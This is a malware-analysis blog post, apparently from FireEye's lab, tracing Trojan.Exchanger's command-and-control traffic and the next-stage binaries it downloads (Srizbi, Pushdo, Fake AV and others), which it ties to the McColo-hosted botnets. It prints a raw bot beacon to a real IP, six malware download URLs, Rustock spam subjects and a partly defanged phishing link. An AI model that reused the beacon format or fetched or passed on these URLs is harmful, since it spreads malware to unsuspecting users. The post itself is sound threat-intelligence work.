FireEye Malware Intelligence Lab

Today I have seen the same carrier (Trojan.Exchanger) downloading six binaries in its next-stage downloads,
and the results really surprised me. It’s clear CnC communication.

From the bot comes the HTTP POST request:

POST /ldr/client03/ldrctl.php HTTP/1.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 74.50.109.2
Content-Length: 94
os=2600&ver=0.0.0.51&idx=98341900-c195-11db-b262-806d6172696f&user=user&ioctl=10&data=(null)

Then, the server responds with a list of URLs for binaries:

HTTP/1.0 200 OK

http://www.micro8051.com/inst_newlq.exe
http://www.micro8051.com/pre17075.exe
http://www.micro8051.com/ccka.exe
http://www.micro8051.com/outpuk23.exe
http://www.micro8051.com/scan0808101.exe
http://www.micro8051.com/scan140815.exe
D7EB6085-E70A-4f5a-9921-E6BD244A8C17

So, what are these binaries - my curiosity sets in.

http://www.micro8051.com/inst_newlq.exe
OK, this is identified to be Srizbi.

http://www.micro8051.com/pre17075.exe
OK, this happens to be Pushdo.

http://www.micro8051.com/ccka.exe
Well, we have an updated version of the malware itself - Trojan.Exchanger.

http://www.micro8051.com/outpuk23.exe
This seems to do nothing for the limited time it spent in my sandnet. On Virustotal only 4
AVs identified it with some generic names.

http://www.micro8051.com/scan0808101.exe
Well, this one simply crashes. Maybe it's not baked enough? That's all the time I could
spend on it for now.

http://www.micro8051.com/scan140815.exe
Ok, this is one of those Fake-AV based social engineering that you may have heard of before.
This is the downloader for a Fake AV. It downloads AntivirusXP2008Installer.exe from
the site www.antivirusxp-2008.net. This fake AV then tells user that his/her PC is infected
and pushes the user to buy this Fake AV from www.antivirusxp-2008.net.

So, what have we got here? On the one hand, this Trojan.Exchanger infected VM is generating
Pushdo and Srizbi CnC traffic at the same time, whereas another sample of the Trojan.Exchanger
which is still running in my lab has downloaded Rustock. These are strong evidence to my old theory
that all the top HTTP botnets hosted at MCCOLO Corporation, including Srizbi , Pushdo and
Rustock, belong to the same gang on RBN (Russian Business Network).

By the way, here are some of the more recent email subjects used by the Rustock running in my sandnet:

msnbc.com: BREAKING NEWS: London named top literary destination
msnbc.com: BREAKING NEWS: Italy takes "hit and run" holiday as economy slows
msnbc.com: BREAKING NEWS: Tories say NHS dental bills rising alarmingly
msnbc.com: BREAKING NEWS: Girl found with arms cut off, police investigate

Here is an example link in the email that is designed to trick the email recipient:

Find out more at http://breakingnews.msnbc.com

While the overlaid caption is http://breakingnews.msnbc.com, which looks like a site for
breaking news at MSNBC.COM, the actual URL is http://BAD-desperate-bk.ru/msnonline.html.
What awaits the tricked user there is a fake flash media palyer download, the now
well-known binary named adobe_flash.exe. Please note that the malicious host name has been
modified with "BAD-" prefix for reader protection.

Atif Mushtaq @ FireEye Malware Intelligence Labs